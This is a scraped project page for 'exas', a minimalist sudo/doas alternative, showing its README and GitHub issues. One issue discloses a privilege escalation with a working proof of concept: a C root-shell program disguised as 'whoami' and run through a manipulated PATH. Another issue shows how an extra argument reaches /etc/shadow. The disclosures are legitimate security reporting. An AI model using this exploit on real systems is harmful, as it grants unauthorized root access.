Git Product home page Git Product logo

exas's Introduction

exas

exas is a minimalist alternative for sudo(8)1 and doas(1)2 that allows the execution of commands as another user.

The configuration is done before compiling, following the principles of suckless.org software, through a header file.

Warning

This software is unfinished. Keep your expectations low. Help to improve exas by contributing.

Getting Started

In this section we will guide you trough the easy process of building exas from source, 'cuase there aren't any package versions of it.

Prerequisites

The things you need before installing the software.

  • GNU Make Utility
  • Clang (can be changed in the config.mk)

Configuration

As mentioned in the intro text, exas if configured through a specific header file that is called config.h (which is a copy of config.def.h).

By default the config.h looks like the following sniped. It allows all users that are in the group of wheel to execute any command as root.

static const Rule rules[] = {
    /* permit   user    group      target user   command     arguments */
    { true,     NULL,   "wheel",   "root",       NULL,       NULL},
};

Lets explain what which "parameter" does and what value it takes.

permit : Whether the rule allows or denys the execution of a match.
Takes a bool value of true or false.

user : Name of user that should be matched by the rule.
Takes an char *. If set to NULL, no user name matching will be done.

group : Name of group that should be matched by the rule.
Takes an char *. If set to NULL, no group name matching will be done.

target user : Name of user to execute as.
Takes an char *. If set to NULL, the rule will allow any target user.

command : Command that should be matched by the rule.
Takes an char *. If set to NULL, the rule will not check for a command.

arguments : Arguments for command.
Takes an array of char **. If set to NULL, the rule will not check for any arguments.

Build Process

  1. Clone exas repository

    git clone https://github.com/b3yc0d3/exas.git
cd exas

  2. Initial exas build using gmake

    gmake

  3. Edit the configuration in config.h
    The default configuration allows all members of the wheels group to execute any command as root.
    See Configuration section

  4. Build exas using gmake

    gmake

Installation

Installation requires the steps from Build Process.

You most likely need to run the following command(s) with root privileges

In order to install exas globally on your system, as any other software, simple run the following command

gmake clean install

Optionally DESTDIR can be set.

gmake DESTDIR=/your/installation/path clean install

Usage

Usage: exas [-u user] -- command [args ...]

Options:
   -u user    specify user to execute as

Parameters
   command    command that should be executed
   args       zero or more arguments for ``command``

A few examples of how to use exas.

exas -- pacman -Syu

For more information, read the manual page of exas

man exas

License

This project is licensed under the ISC-License. See LICENSE file for more informations.

Footnotes

  1. Linux Manual Page - Source - Project Site

  2. OpenBSD Manual Page - Source

exas's People

Contributors

b3yc0d3 avatar nikoverflow avatar

Stargazers

avatar avatar

Watchers

avatar

Forkers

mcmodknower

exas's Issues

Writable $PATH allows for privilege escalation

The $PATH variable is kept in the elevated process that the user requests. If they are allowed one command such as whoami, without an absolute path, they can overwrite this program with the PATH variable:

//config.h
static const Rule rules[] = {
    /* permit   user      group   target user  command     arguments */
    { true,     "user",   NULL,   "root",      "whoami",   NULL},
};

The above rule might be common to let the user execute whoami as root. An attacker can abuse this by creating another binary named "whoami" that executes any code they want, like a shell. Then executing it with the path where the malicious "whoami" resides inside the PATH variable will execute that binary instead of the regular whoami:

//shell.c
#define _GNU_SOURCE
#include <unistd.h>
#include <stdlib.h>

void main() {
    setresuid(0, 0, 0);
    system("/bin/bash -p");
}
user@machine$ id  # low-level user
uid=1001(user) gid=1001(user) groups=1001(user)
user@machine$ gcc shell.c -o whoami
user@machine$ PATH=.:$PATH exas whoami  # whoami executes bash shell instead
password for user:
root@machine# id
uid=0(root) gid=1001(user) groups=1001(user)

The real sudo in comparison protects this by removing environment variables the user sets:

...
user@machine$ PATH=.:$PATH sudo whoami
root
user@machine$ PATH=.:$PATH sudo env | grep PATH  # notice the PATH variable is reset
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin

Optimizing `hasgroup`

You can optimize the hasgroup method by getting the group id of the given name via getgrnam once outside the loop and then just comparing the ids.
This allows you to do only minimal work in the group, optimizing your code directly by eliminating multiple calls for the group info and all calls to strcmp.

`inarray` function broken

Your inarray function is broken as it always assumes that there is exactly one element in the array.

To quote cppreference:

Note that if a has pointer type (such as after array-to-pointer conversion of function parameter type adjustment), this expression would simply divide the number of bytes in a pointer type by the number of bytes in the pointed type.

Since in your case the element type is also a pointer, it divides the size of a pointer by the size of a pointer, resulting in 1.

To fix this you need to either pass the amount of elements in the arrays, or make sure the end of the arrays is marked with NULL and scan for that.

Argument check not preventing additional arguments

The argument check during the rule checking at

exas/exas.c

Line 131 in 61670f4

bool_t matchargs = (currul.arguments == NULL || inarray(params, currul.arguments));
will call inarray with the arguments in the rule as the second parameter. Since inarray has the outer loop over the second list, it will check that all the elements in the second list are also in the first list, aka that all arguments in the rule are also in the command.

This does not prevent extra arguments that might compromise security, like adding -F /etc/shadow to exas -u root dmesg.

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google ❤️ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.